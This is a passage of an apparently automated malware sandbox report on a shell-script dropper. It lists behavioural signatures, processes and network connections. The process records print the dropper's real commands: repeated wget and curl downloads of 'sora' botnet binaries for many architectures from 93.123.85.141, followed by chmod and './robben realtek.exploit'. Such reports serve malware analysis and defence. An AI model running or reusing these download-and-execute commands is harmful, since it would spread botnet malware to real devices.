| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh | N/A |
Processes
/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
[/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-A4XdF6]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-A4XdF6]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-A4XdF6]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-A4XdF6]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-18 02:36
Reported
2024-10-18 02:39
Platform
debian9-mipsel-20240611-en
Max time kernel
32s
Max time network
60s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh | N/A |
Processes
/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
[/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-1R1HHE]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben]
/tmp/robben
[./robben realtek.exploit]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp |